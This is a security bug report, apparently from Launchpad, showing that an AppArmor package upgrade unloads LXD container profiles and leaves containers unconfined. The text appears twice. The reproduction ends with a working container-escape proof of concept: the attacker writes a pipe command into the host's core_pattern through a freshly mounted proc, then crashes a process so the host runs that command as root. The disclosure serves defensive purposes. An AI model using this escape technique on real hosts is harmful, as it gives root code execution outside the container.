AppArmor

Comment 0 for bug 1668892

Revision history for this message

Stéphane Graber (stgraber) wrote on 2017-03-01: apparmor package upgrades unload all LXD profiles

Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.

Example:

# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2

# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)

# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...

# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined

# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$

# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned

This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981

Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.

Example:

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)

# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...

# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern 
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~# 
[1]+  Segmentation fault      (core dumped) sleep 30
root@c2:~# exit

stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned 
-rw-rw-rw- 1 root root 0 Mar  1 03:37 /pwned

This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981